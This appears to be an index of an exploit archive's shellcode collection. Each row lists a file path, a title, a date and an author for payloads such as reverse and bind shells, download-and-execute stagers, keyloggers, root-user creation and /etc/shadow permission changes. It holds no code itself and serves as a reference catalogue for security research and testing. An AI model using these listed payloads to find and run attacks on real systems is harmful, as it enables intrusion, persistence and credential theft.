449 22489 shellcodes/windows/22489.cpp Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) 2012-11-05 b33f shellcode windows
450 40890 shellcodes/windows_x86-64/40890.c Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes) Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) 2016-12-08 Roziul Hasan Khan Shifat shellcode windows_x86-64
451 23622 shellcodes/linux_x86/23622.c Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) 2012-12-24 Hamza Megahed shellcode linux_x86
452 24318 shellcodes/windows/24318.c Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode 2013-01-24 RubberDuck shellcode windows
453 25497 shellcodes/linux_x86/25497.c Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes) Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes) 2013-05-17 Russell Willis shellcode linux_x86
454 40387 shellcodes/hardware/40387.nasm Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes) 2016-09-16 Sean Dillon shellcode hardware
455 27132 shellcodes/linux_mips/27132.txt Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) 2013-07-27 Jacob Holcomb shellcode linux_mips
456 27180 shellcodes/arm/27180.asm Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode 2013-07-28 Matthew Graeber shellcode arm
457 40827 shellcodes/linux_x86/40827.c Linux/x86 - Egghunter Shellcode (31 bytes) 2016-11-25 Filippo Bersani shellcode linux_x86
458 28474 shellcodes/linux_x86/28474.c Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode 2013-09-23 Ryan Fenno shellcode linux_x86
459 40334 shellcodes/windows_x86/40334.c Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes) 2016-09-05 Roziul Hasan Khan Shifat shellcode windows_x86
460 28996 shellcodes/windows/28996.c Windows - MessageBox Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
461 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes) Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
462 40352 shellcodes/windows_x86/40352.c Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
463 33836 shellcodes/windows/33836.txt Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
464 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
465 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
466 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
467 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
468 34778 shellcodes/linux_x86/34778.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) 2014-09-25 Javier Tejedor shellcode linux_x86
469 35205 shellcodes/linux_x86-64/35205.txt Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes) 2014-11-10 Breaking.Technology shellcode linux_x86-64
470 35519 shellcodes/linux_x86/35519.txt Linux/x86 - rmdir Shellcode (37 bytes) 2014-12-11 kw4 shellcode linux_x86
471 35586 shellcodes/linux_x86-64/35586.c Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
472 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
473 35793 shellcodes/windows_x86/35793.txt Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
474 35794 shellcodes/windows_x86-64/35794.txt Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
475 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve /bin/sh Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
481 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36395 shellcodes/linux_x86/36395.c Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
484 36397 shellcodes/linux_x86/36397.c Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes) Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
485 36398 shellcodes/linux_x86/36398.c Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes) Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
486 36637 shellcodes/linux_x86/36637.c Linux/x86 - Disable ASLR Security Shellcode (84 bytes) 2015-04-03 Mohammad Reza Ramezani shellcode linux_x86
487 36672 shellcodes/linux_x86/36672.asm Linux/x86 - Egghunter Shellcode (20 bytes) 2015-04-08 Paw Petersen shellcode linux_x86
488 36673 shellcodes/generator/36673.py Linux/x86 - Typewriter Shellcode (Generator) 2015-04-08 Paw Petersen shellcode generator
494 36781 shellcodes/generator/36781.py Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
495 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
496 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
497 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes) Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
498 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
499 37069 shellcodes/linux_x86/37069.c Linux/x86 - execve /bin/sh Shellcode (26 bytes) 2015-05-20 Reza Behzadpour shellcode linux_x86
500 37251 shellcodes/linux_x86/37251.asm Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) 2015-06-10 B3mB4m shellcode linux_x86
502 37289 shellcodes/linux_x86/37289.txt Linux/x86 - Shutdown(init 0) Shellcode (30 bytes) 2015-06-15 B3mB4m shellcode linux_x86
503 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
504 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
505 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes) Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
507 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
508 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
519 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode 2015-08-12 Anastasios Monachos shellcode linux_x86
520 37895 shellcodes/windows_x86-64/37895.asm Windows 2003 x64 - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
521 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
522 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes) Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
523 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve /bin/bash Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
524 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
525 38116 shellcodes/linux_x86/38116.c Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes) 2015-09-09 Ajith Kp shellcode linux_x86
526 38126 shellcodes/osx/38126.c OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes) OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) 2015-09-10 Fitzl Csaba shellcode osx
527 38150 shellcodes/linux_x86-64/38150.txt Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) 2015-09-11 Fanda Uchytil shellcode linux_x86-64
528 38194 shellcodes/android/38194.c Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes) Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
529 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
530 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
531 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
532 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
533 38959 shellcodes/generator/38959.py Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
534 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
535 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
536 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
537 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
538 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
539 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
540 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
541 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes) Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
542 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes) Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
543 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
544 39383 shellcodes/linux_x86-64/39383.c Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) 2016-01-29 Sathish kumar shellcode linux_x86-64
545 39388 shellcodes/linux_x86-64/39388.c Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
546 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
547 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
548 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes) Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
549 39519 shellcodes/windows_x86/39519.c Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
550 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes) Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
551 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
552 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
553 39625 shellcodes/linux_x86-64/39625.c Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) 2016-03-28 Ajith Kp shellcode linux_x86-64
554 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
555 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
556 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
557 40094 shellcodes/windows_x86/40094.c Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) 2016-07-13 Roziul Hasan Khan Shifat shellcode windows_x86
558 39722 shellcodes/linux_x86/39722.c Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes) Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
559 39723 shellcodes/linux_x86/39723.c Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes) Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
560 39728 shellcodes/generator/39728.py Linux/x86-64 - Bind TCP Shell Shellcode (Generator) 2016-04-25 Ajith Kp shellcode generator
561 39731 shellcodes/windows/39731.c Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes) 2016-04-25 Fugu shellcode windows
562 39754 shellcodes/windows_x86/39754.txt Windows .Net Framework x86 - Execute Native x86 Shellcode 2016-05-02 Jacky5112 shellcode windows_x86
563 39758 shellcodes/linux_x86-64/39758.c Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes) Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
564 39763 shellcodes/linux_x86-64/39763.c Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
565 39794 shellcodes/windows/39794.c Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes) 2016-05-10 Fugu shellcode windows
566 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator) Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
567 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
568 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
569 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
570 39885 shellcodes/multiple/39885.c BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
571 39900 shellcodes/windows_x86/39900.c Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
572 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes) Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
573 39914 shellcodes/windows_x86/39914.c Windows x86 - system(_systeminfo_) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
574 39979 shellcodes/windows/39979.c Windows XP < 10 - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
575 40005 shellcodes/windows_x86/40005.c Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
576 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
577 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes) Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
578 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes) Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
579 40056 shellcodes/linux_x86/40056.c Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2016-07-04 sajith shellcode linux_x86
580 40061 shellcodes/linux_x86-64/40061.c Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes) 2016-07-06 Kyzer shellcode linux_x86-64
581 40075 shellcodes/linux_x86/40075.c Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes) Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes) 2016-07-08 sajith shellcode linux_x86
582 40079 shellcodes/linux_x86-64/40079.c Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes) Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) 2016-07-11 Kyzer shellcode linux_x86-64
583 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
584 40122 shellcodes/linux_x86-64/40122.txt Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
585 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes) Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
586 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve /bin/sh Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
587 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes) Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
588 40175 shellcodes/windows_x86/40175.c Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
589 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
590 40222 shellcodes/linux_x86/40222.c Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes) Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes) 2016-08-10 thryb shellcode linux_x86
591 40223 shellcodes/linux_x86/40223.c Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes) Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes) 2016-08-10 thryb shellcode linux_x86
592 40245 shellcodes/windows_x86/40245.c Windows x86 - MessageBoxA Shellcode (242 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
593 40246 shellcodes/windows_x86/40246.c Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
594 40259 shellcodes/windows_x86/40259.c Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes) 2016-08-18 Roziul Hasan Khan Shifat shellcode windows_x86
595 43562 shellcodes/linux_x86-64/43562.c Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
596 43563 shellcodes/linux_x86-64/43563.c Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
597 43564 shellcodes/linux_x86-64/43564.c Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
598 43565 shellcodes/linux_x86-64/43565.asm Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) 2009-01-01 Mr.Un1k0d3r shellcode linux_x86-64
599 43566 shellcodes/linux_x86-64/43566.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
600 43568 shellcodes/linux_x86-64/43568.asm Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
601 43570 shellcodes/linux_x86-64/43570.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
602 43597 shellcodes/linux_x86-64/43597.c Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) 2009-01-01 Geyslan G. Bem shellcode linux_x86-64
603 43598 shellcodes/linux_x86-64/43598.c Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
604 43599 shellcodes/linux_x86-64/43599.c Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
